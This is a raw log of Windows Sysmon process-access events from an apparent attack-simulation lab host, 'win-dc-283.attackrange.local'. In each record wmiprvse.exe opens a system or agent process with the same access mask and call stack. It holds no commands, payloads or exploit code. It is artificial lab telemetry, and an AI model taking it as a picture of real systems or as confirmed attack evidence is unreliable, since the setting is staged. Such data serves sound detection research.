15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023998Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023997Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023996Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023995Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023994Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023993Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023992Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023991Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023990Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023989Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023988Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023987Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023986Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023985Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023984Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023983Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023982Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023981Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023980Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023979Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 